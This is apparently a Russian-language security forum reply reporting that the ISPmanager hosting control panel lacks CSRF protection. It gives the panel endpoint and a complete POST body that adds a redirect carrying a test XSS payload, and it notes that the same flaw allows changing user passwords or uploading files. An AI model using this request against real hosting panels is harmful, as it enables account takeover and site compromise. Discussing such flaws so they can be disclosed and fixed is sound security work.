Отвечу сам =)

Защиты от CSRF в ISPmanager нет вообще. POST-запрос для добавления редиректа с XSS:

http://site.com/manager/ispmgr

domain=site.com&name=http://site.com/&code=temp&url=http://site.com/alert('xss')&func=wwwredirect.edit&elid=&plid=site.com&sok= ok

Но если CSRF во всех запросах, нет необходимости в использовании XSS. Можно изменить пароль юзера, залить любой файл и т.д. Видео про аналогичный баг - CSRF+IMG на примере хостинга jino.ru